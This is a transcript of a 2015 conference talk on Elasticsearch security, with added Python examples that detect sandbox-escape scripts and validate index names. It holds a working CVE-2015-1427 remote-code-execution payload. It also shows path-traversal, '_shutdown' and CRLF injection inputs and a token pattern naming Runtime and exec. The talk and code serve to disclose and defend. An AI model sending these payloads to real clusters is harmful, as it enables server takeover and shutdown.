Ivan Novikov - ElasticSearch is secure?

DC7499
July 03, 2015


DEFCON Moscow 9


Transcript

  1. ElasticSearch: Is it secure? @d0znpp Wallarm research

  2. What is ElasticSearch?
     “Elasticsearch is a distributed RESTful search engine built for the cloud.”
     Official repo: https://github.com/elastic/elasticsearch
     • Distributed Lucene instances broker
     • RESTful API
     • Native Java API
     Clients: https://www.elastic.co/guide/index.html
  3. Previous works
     • NoSQL Injection for Elasticsearch (Kindle Edition) by Gary Drocella, http://goo.gl/OnfMOz
       => ACL to 9200 and 9300
     • NoSQL Injections: Moving Beyond 'or '1'='1'. Matt Bromiley, Derbycon 2014, http://goo.gl/UBh42h
       => do not produce JSON by string concatenation
     • Securing ElasticSearch, http://goo.gl/Ik3023
       => use Nginx to provide BasicAuth, and other advice
  4. None
  5. Previous bugs: 5 CVE, https://www.elastic.co/community/security
     • CVE-2015-4165 is not disclosed yet ;(
       “All Elasticsearch versions from 1.0.0 to 1.5.2 are vulnerable to an attack that uses Elasticsearch to modify files read and executed by certain other applications.”
     • CVE-2015-3337 path traversal, https://goo.gl/YWwu3a
     • CVE-2015-1427 Groovy RCE, https://goo.gl/Bi9SfC
     • CVE-2014-6439 CORS issue, https://goo.gl/7kMxod
     • CVE-2014-3120 Java RCE, https://goo.gl/iZL5L8
  6. Sandbox bypass (CVE-2015-1427)
     {
       "size": 1,
       "script_fields": {
         "lupin": {
           "script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"
         }
       }
     }
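The payload on this slide reaches java.lang.Runtime by reflection from a class the Groovy sandbox did allow. The following detection check is an added example written for this page, not code from the talk or from Elastic: it walks a request body the way a proxy in front of port 9200 could, pulls out every inline script, and flags the tokens a search-time script should never contain. The two request bodies are constructed for the example, and the token list is an assumption of mine rather than a published signature.

```python
import json
import re

# Constructed request bodies (not captured traffic). BENIGN is an ordinary
# script_fields query; MALICIOUS is the sandbox-bypass payload from the slide,
# which reaches java.lang.Runtime through reflection on an allowed class.
BENIGN = '{"size":1,"script_fields":{"double":{"script":"doc[\'price\'].value * 2"}}}'
MALICIOUS = ('{"size":1,"script_fields":{"lupin":{"script":'
             '"java.lang.Math.class.forName(\\"java.lang.Runtime\\")'
             '.getRuntime().exec(\\"id\\").getText()"}}}')

# Tokens that have no business in a search-time script. This list is an
# assumption for the example, not a vendor-published signature.
SUSPICIOUS = re.compile(
    r"class\.forName|getRuntime|java\.lang\.Runtime|ProcessBuilder|\.exec\(|getClass\(\)"
)


def iter_scripts(node):
    """Yield every inline script string anywhere in a parsed request body.

    Handles the 1.x form {"script": "..."} and the later object form
    {"script": {"inline"|"source": "..."}}, at any nesting depth.
    """
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "script":
                if isinstance(value, str):
                    yield value
                elif isinstance(value, dict):
                    for k in ("inline", "source"):
                        if isinstance(value.get(k), str):
                            yield value[k]
            yield from iter_scripts(value)
    elif isinstance(node, list):
        for item in node:
            yield from iter_scripts(item)


def inline_scripts(body):
    """All inline scripts in a JSON request body, in document order."""
    return list(iter_scripts(json.loads(body)))


def suspicious_scripts(body):
    """Scripts in the body that match the token list; empty means the
    request looks like ordinary scripting."""
    return [s for s in inline_scripts(body) if SUSPICIOUS.search(s)]


def is_suspicious(body):
    return bool(suspicious_scripts(body))


if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("malicious", MALICIOUS)):
        print(label, "->", "BLOCK" if is_suspicious(body) else "pass", suspicious_scripts(body))
```

A check like this is a stopgap for a box that cannot be patched immediately; Elastic's own advisory for CVE-2015-1427 was to upgrade to 1.3.8 / 1.4.3 or set `script.groovy.sandbox.enabled: false`, and the check belongs in the reverse proxy that slide 3 already recommends putting in front of ES, since anything with direct access to 9200 bypasses it.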
  7. What is my point? BugBounty
     https://research.facebook.com/search?q=a%20  -> 200
     https://research.facebook.com/search?q=a%22  -> 500
     $1000 reward for injection into JSON to ElasticSearch. But it might be RCE...
  8. What is my point?
     • Want to hack it through web applications
     • Because it's a really rare case when ES is present at the network perimeter
     • To check wrappers for different platforms for input validation attacks
     • Yes, the same as with Memcached injections, https://goo.gl/9qV620 [BHUS-14]
  9. 4 popular clients (wrappers), http://jolicode.com/blog/elasticsearch-php-clients-test-drive
     • Original (elasticsearch)
     • Sherlock
     • Elastica
     • Nervetattoo
     Let's start from PHP
  10. Input validation kinds
      • RESTful tricks (while user data is in the URL: ../ et al.)
      • JSON syntax breakers ( \ " } { ] [ )
      • Native Java API
      • Filename tricks (each index is a folder with the same name). I suggest that this is the CVE-2015-4165 vector ;)
  11. Input validation kinds
      • RESTful tricks (while user data is in the URL: ../ et al.)
      • JSON syntax breakers ( \ " } { ] [ )
      • Native Java API <- only about RESTful clients now
      • Filename tricks (each index is a folder with the same name). I suggest that this is the CVE-2015-4165 vector ;) <- ES internals, not clients
  12. elasticsearch (original)
      • All URI parts go through PHP urlencode(). But the dot (0x2e) IS NOT encoded, per RFC
      • json_encode protects from injections into values
      $params = array();
      $params['body'] = array('testField' => 'abc');
      $params['index'] = '..';
      $params['type'] = '_shutdown';
      // Document will be indexed to my_index/my_type/<autogenerated_id>
      $ret = $client->index($params);
  13. nervetattoo
      • URI parts “as is”
      • json_encode protects from injections into values
      $results = $es
          ->setIndex("what/../do/you/want!/")
          ->setType("and/../here/also!")
          ->search('title:cool&key=value&script_fields'); // CVE
  14. nervetattoo: but it's a raw socket, baby!
      $results = $es
          ->setIndex(" HTTP/1.1\r\n…”script”:”...”") // CVE
          ->setType("my_type")
          ->search('title:cool');
  15. Conclusions
      • Use DSL methods
      • Index name and type are not for users
      • Do not concatenate strings to JSON
      • Always filter data before putting it into wrappers
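Slides 10 through 15 describe three wrapper weaknesses (percent-encoding that lets `..` and `_shutdown` through, CRLF into a raw socket, and JSON built by string concatenation) and the conclusions that fix them. The following is an added example written for this page in Python, not code from the talk or from any of the PHP clients it tests. It shows the naive path builder beside an allow-list that refuses bad index and type names, the concatenated JSON body beside the encoder-built one, and slide 7's space-versus-quote probe run offline against both builders. All inputs are constructed; the `is_valid_name` rules are my approximation of Elasticsearch's documented index-name restrictions, and holding type names to the same rule is a conservative choice of mine.

```python
import json
import posixpath
from urllib.parse import quote

# Constructed attacker-controlled values modelled on slides 12-14 (not
# captured traffic): a traversal index, a reserved type name, a CRLF payload
# aimed at a wrapper that writes straight to a socket, and a search term that
# closes the "title" value and smuggles in a script_fields clause.
TRAVERSAL_INDEX = ".."
SHUTDOWN_TYPE = "_shutdown"
CRLF_INDEX = "x HTTP/1.1\r\nHost: a\r\n\r\nPOST /_shutdown HTTP/1.1\r\n"
INJECTED_TERM = 'cool"}},"script_fields":{"x":{"script":"1+1"}},"q":{"match":{"t":"'


def naive_path(index, doc_type):
    """Mimics a wrapper that only percent-encodes each path segment (slide 12).
    quote() leaves '.', '-', '_' and '~' alone, so '..' and '_shutdown'
    pass through unchanged."""
    return "/%s/%s" % (quote(index, safe=""), quote(doc_type, safe=""))


def resolved(path):
    """What a front-end that normalises dot-segments (a reverse proxy, or a
    server applying RFC 3986 remove_dot_segments) ends up routing on."""
    return posixpath.normpath(path)


_FORBIDDEN = set('\\/*?"<>| ,#:')


def is_valid_name(name):
    """Allow-list for index/type names that come from user input.

    Assumption: approximates Elasticsearch's documented index-name rules
    (lowercase; none of \\ / * ? " < > | space , # :; no leading _ - +;
    not '.' or '..'; at most 255 bytes). Control characters are rejected
    too, which also stops the CRLF trick of slide 14."""
    if not name or name in (".", ".."):
        return False
    if len(name.encode("utf-8")) > 255:
        return False
    if name[0] in "_-+" or name != name.lower():
        return False
    return not any(c in _FORBIDDEN or ord(c) < 0x20 or ord(c) == 0x7F for c in name)


def safe_path(index, doc_type):
    """Refuses anything that fails the allow-list instead of trying to encode it."""
    if not (is_valid_name(index) and is_valid_name(doc_type)):
        raise ValueError("refusing to build a path from untrusted index/type")
    return "/%s/%s" % (index, doc_type)


def body_by_concat(term):
    """The anti-pattern from slides 7 and 15: user data spliced into JSON text."""
    return '{"query":{"match":{"title":"' + term + '"}}}'


def body_by_encoder(term):
    """The fix: let the JSON encoder escape the value."""
    return json.dumps({"query": {"match": {"title": term}}}, separators=(",", ":"))


def top_level_keys(body):
    """Parse the body the way ES would and report its top-level keys, so the
    caller can see whether a script_fields clause was smuggled in."""
    return set(json.loads(body))


def json_breaker_probe(build_body):
    """Slide 7's bug-bounty check, run offline: push a space and a double quote
    through the body builder and map each to the status a JSON parser would
    produce (200 = parses, 500 = parse error)."""
    results = {}
    for probe in ("a ", 'a"'):
        try:
            json.loads(build_body(probe))
            results[probe] = 200
        except ValueError:
            results[probe] = 500
    return results


if __name__ == "__main__":
    raw = naive_path(TRAVERSAL_INDEX, SHUTDOWN_TYPE)
    print(raw, "->", resolved(raw))
    for n in (TRAVERSAL_INDEX, SHUTDOWN_TYPE, CRLF_INDEX, "my_index", "logs-2015.07.03"):
        print(repr(n), "valid" if is_valid_name(n) else "rejected")
    print(sorted(top_level_keys(body_by_concat(INJECTED_TERM))))
    print(sorted(top_level_keys(body_by_encoder(INJECTED_TERM))))
    print(json_breaker_probe(body_by_concat), json_breaker_probe(body_by_encoder))
```

The probe result is the tell the talk relies on: a concatenating builder answers 200 for `a ` and 500 for `a"`, while an encoder-based builder answers 200 for both. Rejecting names with an allow-list rather than encoding them is what "index name and type are not for users" amounts to in practice, since percent-encoding can never make `..` or a leading underscore harmless.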
  16. https://twitter.com/d0znpp blog.wallarm.com Thx!